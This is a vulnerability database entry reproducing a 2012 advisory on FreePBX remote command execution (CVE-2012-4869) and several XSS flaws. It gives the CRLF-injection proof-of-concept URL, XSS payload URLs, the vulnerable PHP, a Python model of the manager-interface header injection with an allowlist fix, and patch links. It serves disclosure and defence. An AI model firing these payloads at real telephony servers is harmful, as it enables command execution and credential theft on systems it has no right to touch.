FreePBX Remote Command Execution Vulnerability

Vulnerability ID: 1120989    Vulnerability type: Code injection
Published: 2012-03-22    Updated: 2019-12-12
CVE ID: CVE-2012-4869    CNNVD ID: CNNVD-201203-383
Platform: PHP    CVSS score: 7.5
| Vulnerability source
https://www.exploit-db.com/exploits/18649
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201203-383
| Vulnerability details
FreePBX (formerly Asterisk Management Portal) is a tool from the FreePBX project for configuring Asterisk (an IP telephony system) through a web-based GUI. A remote command execution vulnerability exists in the callme_startcall function in recordings/misc/callme_page.php in FreePBX; it is caused by user-supplied input not being properly filtered. An attacker can exploit this vulnerability to steal cookie-based authentication credentials or to execute arbitrary commands in the context of the affected application. FreePBX 2.9, 2.10 and earlier versions are affected; other versions may also be affected.
| Exploit
Product: FreePBX
Version: 2.10.0, 2.9.0 and perhaps earlier versions
Type: Remote Command Execution, XSS
Release Date: March 14, 2012
Vendor Notification Date: Jun 12, 2011
Author: Martin Tschirsich


Overview:


A remote command execution vulnerability and some XSS in current and earlier
FreePBX versions due to missing input sanitization.
FreePBX is a popular implementation (500,000 active phone systems) of
Asterisk (telephony software) based around a web-based configuration
interface and other tools. Some of these installations are on a public IP
address.


Proof of Concept:

RCE:
[HOST]/recordings/misc/callme_page.php?action=c&callmenum=[PHONENUMBER]@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20[CMD]%0D%0A%0D%0A

XSS (2.9.0 and perhaps other versions):
[HOST]/panel/index_amp.php?context=[XSS]
[HOST]/panel/flash/mypage.php?clid=[XSS]
[HOST]/panel/flash/mypage.php?clidname=[base64_encode(XSS)]
[HOST]/panel/dhtml/index.php?context=/../%00">[XSS]
[HOST]/admin/views/freepbx_reload.php/"</script>[XSS]
[HOST]/recordings/index.php?login='>[XSS]


Details (RCE):

Missing input sanitization in htdocs/recordings/misc/callme_page.php:
// line 28-30:
$to         = $_REQUEST['callmenum']; // vulnerable
$msgFrom    = $_REQUEST['msgFrom'];
$new_path   = substr($path, 0, -4);     
// line 38:
$call_status = callme_startcall($to, $msgFrom, $new_path);

Missing input sanitization in htdocs/recordings/includes/callme.php:
// line 88-117:
function callme_startcall($to, $from, $new_path)
{
        global $astman;
        $channel        = "Local/$to@from-internal/n";  // vulnerable
        $context        = "vm-callme";
        $extension      = "s";
        $priority       = "1";
        $callerid       = "VMAIL/$from";
        ...
        /* Arguments to Originate: channel, extension, context, priority,
           timeout, callerid, variable, account, application, data */
        $status = $astman->Originate($channel, $extension, $context,
                                     $priority, NULL, $callerid, $variable, NULL, NULL, NULL, NULL);
        ...
}
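The defect above is header injection into the Asterisk Manager Interface: the Originate action is sent as CRLF-separated "Key: Value" lines, so a callmenum containing %0D%0A ends the Channel header and supplies headers of the attacker's choosing. The following Python model is an added example, not code from the advisory or from FreePBX; it serialises the action the way the manager reads it, shows which headers survive when an unvalidated value is pasted into the channel string, and adds the allowlist check on callmenum that a fix needs (the dial-string pattern is an assumption).

```python
import re

# Allowlist for the callmenum parameter (assumption: the callme page only ever
# needs a plain dial string): optional '+', then digits and DTMF symbols.
# CR, LF, '@' and '/' can never match, so no protocol syntax reaches the socket.
DIAL_STRING = re.compile(r"\+?[0-9*#]{1,32}")

class InvalidDialString(ValueError):
    """callmenum is not a plain dial string (e.g. contains CR/LF or '@')."""

def validate_callmenum(to: str) -> str:
    """Return the value unchanged if it is a dial string, else refuse it."""
    if not DIAL_STRING.fullmatch(to):
        raise InvalidDialString(f"rejected callmenum {to!r}")
    return to

def ami_originate(channel, exten, context, priority, callerid):
    """Serialise an Originate action as the manager interface reads it:
    'Key: Value' lines ending in CRLF, with an empty line closing the action."""
    fields = [("Action", "Originate"), ("Channel", channel), ("Exten", exten),
              ("Context", context), ("Priority", priority), ("CallerID", callerid)]
    return "".join(f"{key}: {value}\r\n" for key, value in fields) + "\r\n"

def parse_ami_action(message):
    """Read the serialised action back line by line and return its header keys.
    A CR/LF inside one value becomes extra headers here, and an injected blank
    line ends the action early, dropping the real Exten/Context that follow."""
    keys = []
    for line in message.split("\r\n"):
        if not line:
            break
        keys.append(line.partition(":")[0])
    return keys

def build_callme_action(to, msg_from, validate=True):
    """Mirror of callme_startcall(); validate=False reproduces the original
    behaviour of pasting callmenum straight into the channel string."""
    if validate:
        to = validate_callmenum(to)
    channel = f"Local/{to}@from-internal/n"
    return ami_originate(channel, "s", "vm-callme", "1", f"VMAIL/{msg_from}")

if __name__ == "__main__":
    # Constructed input in the shape of the advisory's proof of concept.
    crafted = "1000@from-internal/n\r\nApplication: system\r\nData: [CMD]\r\n\r\n"
    print(parse_ami_action(build_callme_action(crafted, "2000", validate=False)))
    # -> ['Action', 'Channel', 'Application', 'Data']
    try:
        build_callme_action(crafted, "2000")
    except InvalidDialString as err:
        print(err)  # the allowlist refuses the same value
```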


Unofficial Patch (RCE, tested with 2.9.0):

Patch htdocs/recordings/modules/callme_page.php:
http://pastebin.com/ZbX50qaZ
Patch htdocs/recordings/modules/voicemail.module:
http://pastebin.com/vv3qczfC



Disclaimer:


The vendor has been contacted and provided with a patch several times since
Jun 12, 2011. Since no intention to address this issue was shown, I felt it
was in the best interest to disclose the vulnerability.

All information in this advisory is provided on an 'as is' basis in the hope
that it will be useful. The author is not responsible for any risks or
occurrences caused by the application of this information.
| References

Source: XF, freepbx-callmepage-command-exec (74174), http://xforce.iss.net/xforce/xfdb/74174
Source: BID, 52630, http://www.securityfocus.com/bid/52630
Source: www.freepbx.org, http://www.freepbx.org/trac/ticket/5711
Source: EXPLOIT-DB, 18659, http://www.exploit-db.com/exploits/18659
Source: EXPLOIT-DB, 18649, http://www.exploit-db.com/exploits/18649
Source: SECUNIA, 48463, http://secunia.com/advisories/48463
Source: FULLDISC, 20120320 FreePBX remote command execution, xss, http://seclists.org/fulldisclosure/2012/Mar/234
Source: packetstormsecurity.org, http://packetstormsecurity.org/files/111028/FreePBX-2.10.0-Remote-Command-Execution-XSS.html